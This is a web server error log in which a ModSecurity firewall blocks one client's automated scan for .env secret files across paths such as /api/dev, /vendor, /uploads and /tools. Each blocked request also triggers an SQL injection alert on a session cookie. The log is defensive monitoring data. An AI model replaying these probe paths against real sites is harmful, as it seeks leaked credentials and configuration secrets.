[Mon May 11 14:10:07.873405 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDgAAAQ4"]
[Mon May 11 14:10:07.873787 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDgAAAQ4"]
[Mon May 11 14:10:07.873985 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDgAAAQ4"]
[Mon May 11 14:10:07.874228 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/dev/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDgAAAQ4"]
[Mon May 11 14:10:08.058693 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:59603] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:08.058729 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:59603] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:08.761930 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHHIOJEyNRN152ArORzXgAAAFI"]
[Mon May 11 14:10:08.762464 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHHIOJEyNRN152ArORzXgAAAFI"]
[Mon May 11 14:10:08.762648 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHHIOJEyNRN152ArORzXgAAAFI"]
[Mon May 11 14:10:08.763012 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/staging/.env"] [unique_id "agHHIOJEyNRN152ArORzXgAAAFI"]
[Mon May 11 14:10:09.055328 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHHIeJEyNRN152ArORzXwAAAFI"]
[Mon May 11 14:10:09.055702 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHHIeJEyNRN152ArORzXwAAAFI"]
[Mon May 11 14:10:09.055887 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHHIeJEyNRN152ArORzXwAAAFI"]
[Mon May 11 14:10:09.056138 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vendor/.env"] [unique_id "agHHIeJEyNRN152ArORzXwAAAFI"]
[Mon May 11 14:10:09.310506 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHHIeJEyNRN152ArORzYAAAAFI"]
[Mon May 11 14:10:09.310900 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHHIeJEyNRN152ArORzYAAAAFI"]
[Mon May 11 14:10:09.311082 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHHIeJEyNRN152ArORzYAAAAFI"]
[Mon May 11 14:10:09.311344 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/lib/.env"] [unique_id "agHHIeJEyNRN152ArORzYAAAAFI"]
[Mon May 11 14:10:09.629829 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHHIeJEyNRN152ArORzYgAAAFI"]
[Mon May 11 14:10:09.630236 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHHIeJEyNRN152ArORzYgAAAFI"]
[Mon May 11 14:10:09.630422 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHHIeJEyNRN152ArORzYgAAAFI"]
[Mon May 11 14:10:09.630683 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/resources/.env"] [unique_id "agHHIeJEyNRN152ArORzYgAAAFI"]
[Mon May 11 14:10:09.956611 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHHIeJEyNRN152ArORzYwAAAFI"]
[Mon May 11 14:10:09.956937 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHHIeJEyNRN152ArORzYwAAAFI"]
[Mon May 11 14:10:09.957097 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHHIeJEyNRN152ArORzYwAAAFI"]
[Mon May 11 14:10:09.957349 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/assets/.env"] [unique_id "agHHIeJEyNRN152ArORzYwAAAFI"]
[Mon May 11 14:10:10.328921 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHHIuJEyNRN152ArORzZAAAAFI"]
[Mon May 11 14:10:10.329323 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHHIuJEyNRN152ArORzZAAAAFI"]
[Mon May 11 14:10:10.329508 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHHIuJEyNRN152ArORzZAAAAFI"]
[Mon May 11 14:10:10.329751 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uploads/.env"] [unique_id "agHHIuJEyNRN152ArORzZAAAAFI"]
[Mon May 11 14:10:10.594530 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHHIuJEyNRN152ArORzZQAAAFI"]
[Mon May 11 14:10:10.594912 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHHIuJEyNRN152ArORzZQAAAFI"]
[Mon May 11 14:10:10.595113 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHHIuJEyNRN152ArORzZQAAAFI"]
[Mon May 11 14:10:10.595379 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/internal/.env"] [unique_id "agHHIuJEyNRN152ArORzZQAAAFI"]
[Mon May 11 14:10:10.945419 2026] [core:error] [pid 1320398:tid 1320422] [client 52.242.216.199:21696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:10.945537 2026] [core:error] [pid 1320398:tid 1320422] [client 52.242.216.199:21696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:10.973653 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHHIuJEyNRN152ArORzZwAAAFI"]
[Mon May 11 14:10:10.974034 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHHIuJEyNRN152ArORzZwAAAFI"]
